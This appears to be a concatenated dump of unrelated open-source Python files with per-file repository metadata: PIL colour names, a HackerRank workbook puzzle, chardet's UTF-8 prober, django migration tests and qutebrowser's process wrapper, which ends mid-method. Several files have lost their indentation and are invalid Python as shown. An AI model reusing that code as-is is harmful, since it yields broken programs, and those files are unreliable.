    :return: a graylevel integer for "L"-based modes, otherwise
        ``(red, green, blue[, alpha])``
"""
# same as getrgb, but converts the result to the given mode
color = getrgb(color)
if mode == "RGB":
return color
if mode == "RGBA":
if len(color) == 3:
color = (color + (255,))
r, g, b, a = color
return r, g, b, a
if Image.getmodebase(mode) == "L":
r, g, b = color
return (r*299 + g*587 + b*114)//1000
return color
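# A few examples, checked against the parsers above and the colour table below:
#   getrgb("red")             -> (255, 0, 0)   # named colour lookup
#   getrgb("#ff0000")         -> (255, 0, 0)   # hex form
#   getrgb("rgb(255, 0, 0)")  -> (255, 0, 0)   # functional form
#   getcolor("red", "L")      -> 76            # (255*299 + 0 + 0) // 1000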
colormap = {
# X11 colour table (from "CSS3 module: Color working draft"), with
# gray/grey spelling issues fixed. This is a superset of HTML 4.0
# colour names used in CSS 1.
"aliceblue": "#f0f8ff",
"antiquewhite": "#faebd7",
"aqua": "#00ffff",
"aquamarine": "#7fffd4",
"azure": "#f0ffff",
"beige": "#f5f5dc",
"bisque": "#ffe4c4",
"black": "#000000",
"blanchedalmond": "#ffebcd",
"blue": "#0000ff",
"blueviolet": "#8a2be2",
"brown": "#a52a2a",
"burlywood": "#deb887",
"cadetblue": "#5f9ea0",
"chartreuse": "#7fff00",
"chocolate": "#d2691e",
"coral": "#ff7f50",
"cornflowerblue": "#6495ed",
"cornsilk": "#fff8dc",
"crimson": "#dc143c",
"cyan": "#00ffff",
"darkblue": "#00008b",
"darkcyan": "#008b8b",
"darkgoldenrod": "#b8860b",
"darkgray": "#a9a9a9",
"darkgrey": "#a9a9a9",
"darkgreen": "#006400",
"darkkhaki": "#bdb76b",
"darkmagenta": "#8b008b",
"darkolivegreen": "#556b2f",
"darkorange": "#ff8c00",
"darkorchid": "#9932cc",
"darkred": "#8b0000",
"darksalmon": "#e9967a",
"darkseagreen": "#8fbc8f",
"darkslateblue": "#483d8b",
"darkslategray": "#2f4f4f",
"darkslategrey": "#2f4f4f",
"darkturquoise": "#00ced1",
"darkviolet": "#9400d3",
"deeppink": "#ff1493",
"deepskyblue": "#00bfff",
"dimgray": "#696969",
"dimgrey": "#696969",
"dodgerblue": "#1e90ff",
"firebrick": "#b22222",
"floralwhite": "#fffaf0",
"forestgreen": "#228b22",
"fuchsia": "#ff00ff",
"gainsboro": "#dcdcdc",
"ghostwhite": "#f8f8ff",
"gold": "#ffd700",
"goldenrod": "#daa520",
"gray": "#808080",
"grey": "#808080",
"green": "#008000",
"greenyellow": "#adff2f",
"honeydew": "#f0fff0",
"hotpink": "#ff69b4",
"indianred": "#cd5c5c",
"indigo": "#4b0082",
"ivory": "#fffff0",
"khaki": "#f0e68c",
"lavender": "#e6e6fa",
"lavenderblush": "#fff0f5",
"lawngreen": "#7cfc00",
"lemonchiffon": "#fffacd",
"lightblue": "#add8e6",
"lightcoral": "#f08080",
"lightcyan": "#e0ffff",
"lightgoldenrodyellow": "#fafad2",
"lightgreen": "#90ee90",
"lightgray": "#d3d3d3",
"lightgrey": "#d3d3d3",
"lightpink": "#ffb6c1",
"lightsalmon": "#ffa07a",
"lightseagreen": "#20b2aa",
"lightskyblue": "#87cefa",
"lightslategray": "#778899",
"lightslategrey": "#778899",
"lightsteelblue": "#b0c4de",
"lightyellow": "#ffffe0",
"lime": "#00ff00",
"limegreen": "#32cd32",
"linen": "#faf0e6",
"magenta": "#ff00ff",
"maroon": "#800000",
"mediumaquamarine": "#66cdaa",
"mediumblue": "#0000cd",
"mediumorchid": "#ba55d3",
"mediumpurple": "#9370db",
"mediumseagreen": "#3cb371",
"mediumslateblue": "#7b68ee",
"mediumspringgreen": "#00fa9a",
"mediumturquoise": "#48d1cc",
"mediumvioletred": "#c71585",
"midnightblue": "#191970",
"mintcream": "#f5fffa",
"mistyrose": "#ffe4e1",
"moccasin": "#ffe4b5",
"navajowhite": "#ffdead",
"navy": "#000080",
"oldlace": "#fdf5e6",
"olive": "#808000",
"olivedrab": "#6b8e23",
"orange": "#ffa500",
"orangered": "#ff4500",
"orchid": "#da70d6",
"palegoldenrod": "#eee8aa",
"palegreen": "#98fb98",
"paleturquoise": "#afeeee",
"palevioletred": "#db7093",
"papayawhip": "#ffefd5",
"peachpuff": "#ffdab9",
"peru": "#cd853f",
"pink": "#ffc0cb",
"plum": "#dda0dd",
"powderblue": "#b0e0e6",
"purple": "#800080",
"red": "#ff0000",
"rosybrown": "#bc8f8f",
"royalblue": "#4169e1",
"saddlebrown": "#8b4513",
"salmon": "#fa8072",
"sandybrown": "#f4a460",
"seagreen": "#2e8b57",
"seashell": "#fff5ee",
"sienna": "#a0522d",
"silver": "#c0c0c0",
"skyblue": "#87ceeb",
"slateblue": "#6a5acd",
"slategray": "#708090",
"slategrey": "#708090",
"snow": "#fffafa",
"springgreen": "#00ff7f",
"steelblue": "#4682b4",
"tan": "#d2b48c",
"teal": "#008080",
"thistle": "#d8bfd8",
"tomato": "#ff6347",
"turquoise": "#40e0d0",
"violet": "#ee82ee",
"wheat": "#f5deb3",
"white": "#ffffff",
"whitesmoke": "#f5f5f5",
"yellow": "#ffff00",
"yellowgreen": "#9acd32",
}
| Amechi101/concepteur-market-app | venv/lib/python2.7/site-packages/PIL/ImageColor.py | Python | mit | 8,085 | 0.007421 |
#!/bin/python
"""
Lisa just got a new math workbook. A workbook contains exercise problems, grouped into chapters.
There are n chapters in Lisa's workbook, numbered from 1 to n.
The i-th chapter has t_i problems, numbered from 1 to t_i.
Each page can hold up to k problems. There are no empty pages or unnecessary spaces, so only the last page of a chapter may contain fewer than k problems.
Each new chapter starts on a new page, so a page will never contain problems from more than one chapter.
The page number indexing starts at 1.
Lisa believes a problem to be special if its index (within a chapter) is the same as the page number where it's located. Given the details for Lisa's workbook, can you count its number of special problems?
Note: See the diagram in the Explanation section for more details.
Input Format
The first line contains two integers n and k, the number of chapters and the maximum number of problems per page respectively.
The second line contains n integers t_1, t_2, ..., t_n, where t_i denotes the number of problems in the i-th chapter.
Constraints
1 <= n, k, t_i <= 100
Output Format
Print the number of special problems in Lisa's workbook.
Sample Input
5 3
4 2 6 1 10
Sample Output
4
"""
def spl_question(arr, n, k):
prev_accum = cumm = tot_pg_num = ques = count = 0
for each_chptr in arr:
# O(N)
pgs, rem = divmod(each_chptr, k)
ques = prev_accum = cumm = 0
for pg in xrange(pgs):
tot_pg_num += 1
ques += k
cumm = ques
if prev_accum < tot_pg_num <= cumm:
count += 1
prev_accum = cumm
if rem:
tot_pg_num += 1
ques += rem
cumm = ques
if prev_accum < tot_pg_num <= cumm:
count += 1
return count
if __name__ == "__main__":
n, k = raw_input().strip("\n").split()
n, k = int(n), int(k)
arr = map(int, raw_input().strip("\n").split())
    print spl_question(arr, n, k)
| codecakes/algorithms_monk | implementation/lisa_workbook_array_single_iter.py | Python | mit | 2,037 | 0.003939 |
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .constants import eStart, eError, eItsMe
from .charsetprober import CharSetProber
from .codingstatemachine import CodingStateMachine
from .mbcssm import UTF8SMModel
ONE_CHAR_PROB = 0.5
class UTF8Prober(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(UTF8SMModel)
self.reset()
def reset(self):
CharSetProber.reset(self)
self._mCodingSM.reset()
self._mNumOfMBChar = 0
def get_charset_name(self):
return "utf-8"
def feed(self, aBuf):
for c in aBuf:
codingState = self._mCodingSM.next_state(c)
if codingState == eError:
self._mState = constants.eNotMe
break
elif codingState == eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == eStart:
if self._mCodingSM.get_current_charlen() >= 2:
self._mNumOfMBChar += 1
if self.get_state() == constants.eDetecting:
if self.get_confidence() > constants.SHORTCUT_THRESHOLD:
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
unlike = 0.99
if self._mNumOfMBChar < 6:
for i in range(0, self._mNumOfMBChar):
unlike = unlike * ONE_CHAR_PROB
return 1.0 - unlike
else:
return unlike
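# Example of the confidence computation above: after seeing 3 multi-byte
# sequences, confidence = 1 - 0.99 * 0.5**3 = 0.87625; once 6 or more
# multi-byte sequences have been seen, a flat 0.99 is returned.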
| archifix/settings | sublime/Packages/SublimeCodeIntel/libs/chardet/utf8prober.py | Python | mit | 2,680 | 0.001866 |
from django.core.management import call_command
import pytest
import septentrion
def test_showmigrations_command_override(mocker):
mock_django_handle = mocker.patch(
'django.core.management.commands.showmigrations.Command.handle')
mock_show_migrations = mocker.patch(
'septentrion.show_migrations', return_value=b'')
call_command('showmigrations')
assert mock_django_handle.called is False
assert mock_show_migrations.called is True
@pytest.mark.parametrize("manage", [True, False, None])
def test_north_manage_migrations(mocker, settings, manage):
if manage is not None:
settings.NORTH_MANAGE_DB = manage
if manage is None and hasattr(settings, 'NORTH_MANAGE_DB'):
del settings.NORTH_MANAGE_DB
mock = mocker.patch('septentrion.show_migrations', return_value=b'')
call_command('showmigrations')
assert mock.called == bool(manage)
def test_showmigrations_schema_not_inited(capsys, mocker):
mock_version = mocker.patch(
'septentrion.db.get_current_schema_version')
# schema not inited
mock_version.return_value = None
call_command('showmigrations')
captured = capsys.readouterr()
assert 'Current version is None' in captured.out
def test_showmigrations_schema(capsys, mocker):
# schema inited
mock_version = mocker.patch(
'septentrion.db.get_current_schema_version')
mock_version.return_value = septentrion.versions.Version.from_string('1.1')
mock_plan = mocker.patch(
'septentrion.core.build_migration_plan')
mock_plan.return_value = [
{
'version': "Version 1.2",
'plan': [
('a-ddl.sql', True, '/somewhere/a-ddl.sql', False),
('b-ddl.sql', False, '/somewhere/b-ddl.sql', True),
]
},
{
'version': "Version 1.3",
'plan': [
('c-ddl.sql', False, '/somewhere/c-ddl.sql', False),
]
}
]
call_command('showmigrations')
captured = capsys.readouterr()
assert "Current version is 1.1" in captured.out
assert "Target version is 1.3" in captured.out
assert "Version 1.2" in captured.out
assert "[X] \x1b[0ma-ddl.sql" in captured.out
assert "[ ] \x1b[0mb-ddl.sql" in captured.out
assert "Version 1.3" in captured.out
assert "[ ] \x1b[0mc-ddl.sql" in captured.out
| novafloss/django-north | tests/test_showmigrations_command.py | Python | mit | 2,400 | 0 |
# -*- coding: utf-8 -*-
from model.group import Group
def test_add_group(app):
    old_groups = app.group.get_group_list()
    group = Group(name="fdsasdaf", header="group", footer="group")
    app.group.create(group)
    assert len(old_groups) + 1 == app.group.count()
    new_groups = app.group.get_group_list()
    old_groups.append(group)
    assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
#def test_add_empty_group(app):
# old_groups = app.group.get_group_list()
# group = (Group(name="", header="", footer=""))
# app.group.create(group)
# new_groups = app.group.get_group_list()
# assert len(old_groups) + 1 == len(new_groups)
# old_groups.append(group)
# assert sorted(old_groups, key = Group.id_or_max) == sorted (new_groups,key = Group.id_or_max)
| Coriolan8/python_traning | test/test_add_group.py | Python | apache-2.0 | 824 | 0.01335 |
# coding=utf-8
__all__ = ['admin']
| CSGreater-Developers/HMC-Grader | app/userViews/admin/__init__.py | Python | mit | 36 | 0 |
"""Script to display a collection of paths after inserting one new path
Usage:
    add_to_a_path.py SYMBOL PATH
    add_to_a_path.py (-s | -i INDEX) SYMBOL PATH
Options:
-h, --help Show this help and exit
-v, --version Show version number and exit
-s, --start Add the path at start of list of paths
-i INDEX, --index=INDEX The index at which the path will be inserted
Examples of use:
$ export PATH=/bin:/usr/bin
$ add_to_a_path.py PATH /usr/local/bin
PATH=/bin:/usr/bin:/usr/local/bin
$ add_to_a_path.py PATH /usr/local/bin --start
PATH=/usr/local/bin:/bin:/usr/bin
"""
from __future__ import print_function
import os
import sys
import argparse
from bdb import BdbQuit
__version__ = '0.1.0'
class ScriptError(NotImplementedError):
pass
def version():
    print('%s %s' % (sys.argv[0], __version__))
raise SystemExit
def parse_args():
"""Parse out command line arguments"""
parser = argparse.ArgumentParser(description=__doc__.splitlines()[0])
parser.add_argument('symbol', help='The bash symbol to be changed')
parser.add_argument('path', help='The path to be added')
parser.add_argument('-s', '--start', action='store_true',
help='Add the path at start of list of paths')
parser.add_argument('-i', '--index', type=int,
help='The index at which the path will be inserted')
parser.add_argument('-v', '--version', action='store_true',
help='Show version')
args = parser.parse_args()
if args.version:
version()
if not args.index:
if args.start:
args.index = 0
else:
args.index = False
return args
def _add_symbol_to_paths(paths, symbol, i):
if i is False:
i = len(paths)
result = paths[:]
if not symbol:
return result
if symbol not in result:
result.insert(i, symbol)
return result
j = result.index(symbol)
if i != j:
del result[j]
result.insert(i, symbol)
return result
def get_arg_path(args):
path = args.path
if not path:
return ''
user_path = os.path.expanduser(path)
real_path = os.path.realpath(user_path)
if not os.path.isdir(real_path):
return ''
return real_path
def split_paths(string):
if not string:
return []
return [p for p in string.split(os.path.pathsep) if p]
def get_paths(args):
symbol = args.symbol
paths_string = ''
if symbol in os.environ:
paths_string = os.environ[symbol]
elif os.path.pathsep in symbol:
paths_string = symbol
return split_paths(paths_string)
def script(args):
arg_path = get_arg_path(args)
paths = get_paths(args)
if not arg_path:
if not paths:
return False
elif os.path.isdir(arg_path):
if arg_path in paths:
paths.remove(arg_path)
paths = _add_symbol_to_paths(paths, arg_path, args.index)
else:
return False
print('='.join((args.symbol, os.path.pathsep.join(paths))))
return True
def main():
"""Run the script"""
try:
args = parse_args()
return os.EX_OK if script(args) else not os.EX_OK
except (SystemExit, BdbQuit):
pass
return os.EX_OK
if __name__ == '__main__':
sys.exit(main())
| jalanb/jab | src/python/add_to_a_path.py | Python | mit | 3,399 | 0 |
from __future__ import absolute_import, division, print_function
import _ast
from jaspyx.context.block import BlockContext
from jaspyx.visitor import BaseVisitor
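# Rough sketch of the JavaScript emitted by this visitor for a Python
# ``if/elif/else`` chain (illustrative; spacing comes from the block context):
#
#   if(a) { ... } else if(b) { ... } else { ... }
#
# An ``elif`` arrives as an ``orelse`` holding a single ``ast.If`` node and is
# folded into ``else if`` rather than a nested block.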
class IfElse(BaseVisitor):
def visit_If(self, node, skip_indent=False):
if not skip_indent:
self.indent()
self.output('if(')
self.visit(node.test)
self.output(') ')
self.block(node.body, context=BlockContext(self.stack[-1]))
if node.orelse:
self.output(' else ')
if len(node.orelse) == 1 and isinstance(node.orelse[0], _ast.If):
self.visit_If(node.orelse[0], True)
else:
self.block(node.orelse, context=BlockContext(self.stack[-1]))
self.output('\n')
else:
self.output('\n')
| ztane/jaspyx | jaspyx/visitor/if_else.py | Python | mit | 809 | 0 |
"""
mock_django.signals
~~~~~~~~~~~~~~~~
:copyright: (c) 2012 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import contextlib
import mock
@contextlib.contextmanager
def mock_signal_receiver(signal, wraps=None, **kwargs):
"""
Temporarily attaches a receiver to the provided ``signal`` within the scope
of the context manager.
The mocked receiver is returned as the ``as`` target of the ``with``
statement.
To have the mocked receiver wrap a callable, pass the callable as the
``wraps`` keyword argument. All other keyword arguments provided are passed
through to the signal's ``connect`` method.
>>> with mock_signal_receiver(post_save, sender=Model) as receiver:
>>> Model.objects.create()
    >>> assert receiver.call_count == 1
"""
if wraps is None:
        def wraps(*args, **kwargs):
return None
receiver = mock.Mock(wraps=wraps)
signal.connect(receiver, **kwargs)
yield receiver
signal.disconnect(receiver)
| devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/mock_django/signals.py | Python | agpl-3.0 | 1,028 | 0 |
from couchpotato.core.event import addEvent
from couchpotato.core.logger import CPLog
from couchpotato.core.notifications.base import Notification
import os
import subprocess
log = CPLog(__name__)
class Synoindex(Notification):
index_path = '/usr/syno/bin/synoindex'
def __init__(self):
super(Synoindex, self).__init__()
addEvent('renamer.after', self.addToLibrary)
    def addToLibrary(self, message = None, group = None):
        if self.isDisabled(): return
        if group is None: group = {}
        command = [self.index_path, '-A', group.get('destination_dir')]
        log.info('Executing synoindex command: %s ', command)
        try:
            p = subprocess.Popen(command, stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
            out = p.communicate()
            log.info('Result from synoindex: %s', str(out))
            return True
        except OSError, e:
            log.error('Unable to run synoindex: %s', e)
            return False
def test(self, **kwargs):
return {
'success': os.path.isfile(self.index_path)
}
| coolbombom/CouchPotatoServer | couchpotato/core/notifications/synoindex/main.py | Python | gpl-3.0 | 1,093 | 0.009149 |
# -*- coding: utf-8 -*-
#
# deluge/ui/common.py
#
# Copyright (C) Damien Churchill 2008-2009 <[email protected]>
# Copyright (C) Andrew Resch 2009 <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, write to:
# The Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor
# Boston, MA 02110-1301, USA.
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
#
#
"""
The ui common module contains methods and classes that are deemed useful for
all the interfaces.
"""
import os
import sys
import urlparse
import locale
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
from deluge import bencode
from deluge.common import decode_string, path_join
from deluge.log import LOG as log
import deluge.configmanager
class TorrentInfo(object):
"""
Collects information about a torrent file.
:param filename: The path to the torrent
:type filename: string
"""
def __init__(self, filename, filetree=1):
# Get the torrent data from the torrent file
try:
log.debug("Attempting to open %s.", filename)
self.__m_filedata = open(filename, "rb").read()
self.__m_metadata = bencode.bdecode(self.__m_filedata)
except Exception, e:
log.warning("Unable to open %s: %s", filename, e)
raise e
self.__m_info_hash = sha(bencode.bencode(self.__m_metadata["info"])).hexdigest()
# Get encoding from torrent file if available
self.encoding = "UTF-8"
if "encoding" in self.__m_metadata:
self.encoding = self.__m_metadata["encoding"]
elif "codepage" in self.__m_metadata:
self.encoding = str(self.__m_metadata["codepage"])
# Check if 'name.utf-8' is in the torrent and if not try to decode the string
# using the encoding found.
if "name.utf-8" in self.__m_metadata["info"]:
self.__m_name = decode_string(self.__m_metadata["info"]["name.utf-8"])
else:
self.__m_name = decode_string(self.__m_metadata["info"]["name"], self.encoding)
# Get list of files from torrent info
paths = {}
dirs = {}
if self.__m_metadata["info"].has_key("files"):
prefix = ""
if len(self.__m_metadata["info"]["files"]) > 1:
prefix = self.__m_name
for index, f in enumerate(self.__m_metadata["info"]["files"]):
if "path.utf-8" in f:
path = os.path.join(prefix, *f["path.utf-8"])
else:
path = decode_string(os.path.join(prefix, decode_string(os.path.join(*f["path"]), self.encoding)), self.encoding)
f["index"] = index
paths[path] = f
dirname = os.path.dirname(path)
while dirname:
dirinfo = dirs.setdefault(dirname, {})
dirinfo["length"] = dirinfo.get("length", 0) + f["length"]
dirname = os.path.dirname(dirname)
if filetree == 2:
def walk(path, item):
if item["type"] == "dir":
item.update(dirs[path])
else:
item.update(paths[path])
item["download"] = True
file_tree = FileTree2(paths.keys())
file_tree.walk(walk)
else:
def walk(path, item):
if type(item) is dict:
return item
return [paths[path]["index"], paths[path]["length"], True]
file_tree = FileTree(paths)
file_tree.walk(walk)
self.__m_files_tree = file_tree.get_tree()
else:
if filetree == 2:
self.__m_files_tree = {
"contents": {
self.__m_name: {
"type": "file",
"index": 0,
"length": self.__m_metadata["info"]["length"],
"download": True
}
}
}
else:
self.__m_files_tree = {
self.__m_name: (0, self.__m_metadata["info"]["length"], True)
}
self.__m_files = []
if self.__m_metadata["info"].has_key("files"):
prefix = ""
if len(self.__m_metadata["info"]["files"]) > 1:
prefix = self.__m_name
for f in self.__m_metadata["info"]["files"]:
if "path.utf-8" in f:
path = os.path.join(prefix, *f["path.utf-8"])
else:
path = decode_string(os.path.join(prefix, decode_string(os.path.join(*f["path"]), self.encoding)), self.encoding)
self.__m_files.append({
'path': path,
'size': f["length"],
'download': True
})
else:
self.__m_files.append({
"path": self.__m_name,
"size": self.__m_metadata["info"]["length"],
"download": True
})
def as_dict(self, *keys):
"""
Return the torrent info as a dictionary, only including the passed in
keys.
:param keys: a number of key strings
:type keys: string
"""
return dict([(key, getattr(self, key)) for key in keys])
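    # Usage sketch (the torrent path is illustrative):
    #   info = TorrentInfo("/tmp/example.torrent")
    #   info.as_dict("name", "info_hash")  # -> {"name": ..., "info_hash": ...}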
@property
def name(self):
"""
The name of the torrent.
:rtype: string
"""
return self.__m_name
@property
def info_hash(self):
"""
        The torrent's info_hash
:rtype: string
"""
return self.__m_info_hash
@property
def files(self):
"""
A list of the files that the torrent contains.
:rtype: list
"""
return self.__m_files
@property
def files_tree(self):
"""
A dictionary based tree of the files.
::
{
"some_directory": {
"some_file": (index, size, download)
}
}
:rtype: dictionary
"""
return self.__m_files_tree
@property
def metadata(self):
"""
        The torrent's metadata.
:rtype: dictionary
"""
return self.__m_metadata
@property
def filedata(self):
"""
        The torrent's file data. This will be the raw bencoded data read
from the torrent file.
:rtype: string
"""
return self.__m_filedata
class FileTree2(object):
"""
Converts a list of paths in to a file tree.
:param paths: The paths to be converted
:type paths: list
"""
def __init__(self, paths):
self.tree = {"contents": {}, "type": "dir"}
def get_parent(path):
parent = self.tree
while "/" in path:
directory, path = path.split("/", 1)
child = parent["contents"].get(directory)
if child is None:
parent["contents"][directory] = {
"type": "dir",
"contents": {}
}
parent = parent["contents"][directory]
return parent, path
for path in paths:
if path[-1] == "/":
path = path[:-1]
parent, path = get_parent(path)
parent["contents"][path] = {
"type": "dir",
"contents": {}
}
else:
parent, path = get_parent(path)
parent["contents"][path] = {
"type": "file"
}
def get_tree(self):
"""
Return the tree.
:returns: the file tree.
:rtype: dictionary
"""
return self.tree
def walk(self, callback):
"""
Walk through the file tree calling the callback function on each item
contained.
:param callback: The function to be used as a callback, it should have
the signature func(item, path) where item is a `tuple` for a file
and `dict` for a directory.
:type callback: function
"""
def walk(directory, parent_path):
for path in directory["contents"].keys():
full_path = path_join(parent_path, path)
if directory["contents"][path]["type"] == "dir":
directory["contents"][path] = callback(full_path, directory["contents"][path]) or \
directory["contents"][path]
walk(directory["contents"][path], full_path)
else:
directory["contents"][path] = callback(full_path, directory["contents"][path]) or \
directory["contents"][path]
walk(self.tree, "")
def __str__(self):
lines = []
def write(path, item):
depth = path.count("/")
path = os.path.basename(path)
path = path + "/" if item["type"] == "dir" else path
lines.append(" " * depth + path)
self.walk(write)
return "\n".join(lines)
class FileTree(object):
"""
Convert a list of paths in a file tree.
:param paths: The paths to be converted.
:type paths: list
"""
def __init__(self, paths):
self.tree = {}
def get_parent(path):
parent = self.tree
while "/" in path:
directory, path = path.split("/", 1)
child = parent.get(directory)
if child is None:
parent[directory] = {}
parent = parent[directory]
return parent, path
for path in paths:
if path[-1] == "/":
path = path[:-1]
parent, path = get_parent(path)
parent[path] = {}
else:
parent, path = get_parent(path)
parent[path] = []
def get_tree(self):
"""
Return the tree, after first converting all file lists to a tuple.
:returns: the file tree.
:rtype: dictionary
"""
def to_tuple(path, item):
if type(item) is dict:
return item
return tuple(item)
self.walk(to_tuple)
return self.tree
def walk(self, callback):
"""
Walk through the file tree calling the callback function on each item
contained.
:param callback: The function to be used as a callback, it should have
the signature func(item, path) where item is a `tuple` for a file
and `dict` for a directory.
:type callback: function
"""
def walk(directory, parent_path):
for path in directory.keys():
full_path = os.path.join(parent_path, path)
if type(directory[path]) is dict:
directory[path] = callback(full_path, directory[path]) or \
directory[path]
walk(directory[path], full_path)
else:
directory[path] = callback(full_path, directory[path]) or \
directory[path]
walk(self.tree, "")
def __str__(self):
lines = []
def write(path, item):
depth = path.count("/")
path = os.path.basename(path)
            path = path + "/" if type(item) is dict else path
lines.append(" " * depth + path)
self.walk(write)
return "\n".join(lines)
def get_localhost_auth():
"""
    Grabs the localclient auth line from the 'auth' file.
    :returns: a tuple of (username, password) to log in as
    :rtype: tuple
"""
auth_file = deluge.configmanager.get_config_dir("auth")
if os.path.exists(auth_file):
for line in open(auth_file):
if line.startswith("#"):
# This is a comment line
continue
line = line.strip()
try:
lsplit = line.split(":")
except Exception, e:
log.error("Your auth file is malformed: %s", e)
continue
if len(lsplit) == 2:
username, password = lsplit
elif len(lsplit) == 3:
username, password, level = lsplit
else:
log.error("Your auth file is malformed: Incorrect number of fields!")
continue
if username == "localclient":
return (username, password)
return ("", "")
| laanwj/deluge | deluge/ui/common.py | Python | gpl-3.0 | 13,980 | 0.001431 |
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2015-2021 Florian Bruhin (The Compiler) <[email protected]>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""A QProcess which shows notifications in the GUI."""
import locale
import shlex
from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QObject, QProcess,
QProcessEnvironment)
from qutebrowser.utils import message, log, utils
from qutebrowser.browser import qutescheme
class GUIProcess(QObject):
"""An external process which shows notifications in the GUI.
Args:
cmd: The command which was started.
args: A list of arguments which gets passed.
verbose: Whether to show more messages.
_output_messages: Show output as messages.
_started: Whether the underlying process is started.
_proc: The underlying QProcess.
_what: What kind of thing is spawned (process/editor/userscript/...).
Used in messages.
Signals:
error/finished/started signals proxied from QProcess.
"""
error = pyqtSignal(QProcess.ProcessError)
finished = pyqtSignal(int, QProcess.ExitStatus)
started = pyqtSignal()
def __init__(self, what, *, verbose=False, additional_env=None,
output_messages=False, parent=None):
super().__init__(parent)
self._what = what
self.verbose = verbose
self._output_messages = output_messages
self._started = False
self.cmd = None
self.args = None
self._proc = QProcess(self)
self._proc.errorOccurred.connect(self._on_error)
self._proc.errorOccurred.connect(self.error)
self._proc.finished.connect(self._on_finished)
self._proc.finished.connect(self.finished)
self._proc.started.connect(self._on_started)
self._proc.started.connect(self.started)
if additional_env is not None:
procenv = QProcessEnvironment.systemEnvironment()
for k, v in additional_env.items():
procenv.insert(k, v)
self._proc.setProcessEnvironment(procenv)
@pyqtSlot(QProcess.ProcessError)
def _on_error(self, error):
"""Show a message if there was an error while spawning."""
if error == QProcess.Crashed and not utils.is_windows:
# Already handled via ExitStatus in _on_finished
return
msg = self._proc.errorString()
message.error("Error while spawning {}: {}".format(self._what, msg))
@pyqtSlot(int, QProcess.ExitStatus)
def _on_finished(self, code, status):
"""Show a message when the process finished."""
self._started = False
log.procs.debug("Process finished with code {}, status {}.".format(
code, status))
encoding = locale.getpreferredencoding(do_setlocale=False)
stderr = self._proc.readAllStandardError().data().decode(
encoding, 'replace')
stdout = self._proc.readAllStandardOutput().data().decode(
encoding, 'replace')
if self._output_messages:
if stdout:
message.info(stdout.strip())
if stderr:
message.error(stderr.strip())
if status == QProcess.CrashExit:
exitinfo = "{} crashed.".format(self._what.capitalize())
message.error(exitinfo)
elif status == QProcess.NormalExit and code == 0:
exitinfo = "{} exited successfully.".format(
self._what.capitalize())
if self.verbose:
message.info(exitinfo)
else:
assert status == QProcess.NormalExit
# We call this 'status' here as it makes more sense to the user -
# it's actually 'code'.
exitinfo = ("{} exited with status {}, see :messages for "
"details.").format(self._what.capitalize(), code)
message.error(exitinfo)
if stdout:
log.procs.error("Process stdout:\n" + stdout.strip())
if stderr:
log.procs.error("Process stderr:\n" + stderr.strip())
qutescheme.spawn_output = self._spawn_format(exitinfo, stdout, stderr)
def _spawn_format(self, exitinfo, stdout, stderr):
"""Produce a formatted string for spawn output."""
stdout = (stdout or "(No output)").strip()
stderr = (stderr or "(No output)").strip()
spawn_string = ("{}\n"
"\nProcess stdout:\n {}"
"\nProcess stderr:\n {}").format(exitinfo,
stdout, stderr)
return spawn_string
@pyqtSlot()
def _on_started(self):
"""Called when the process started successfully."""
log.procs.debug("Process started.")
assert not self._started
self._started = True
def _pre_start(self, cmd, args):
"""Prepare starting of a QProcess."""
if self._started:
raise ValueError("Trying to start a running QProcess!")
self.cmd = cmd
self.args = args
fake_cmdline = ' '.join(shlex.quote(e) for e in [cmd] + list(args))
log.procs.debug("Executing: {}".format(fake_cmdline))
if self.verbose:
message.info('Executing: ' + fake_cmdline)
def start(self, cmd, args):
"""Convenience wrapper around QProcess::start."""
log.procs.debug("Starting process.")
self._pre_start(cmd, args)
self._proc.start(cmd, args)
self._proc.closeWriteChannel()
def start_detached(self, cmd, args):
"""Convenience wrapper around QProcess::startDetached."""
log.procs.debug("Starting detached.")
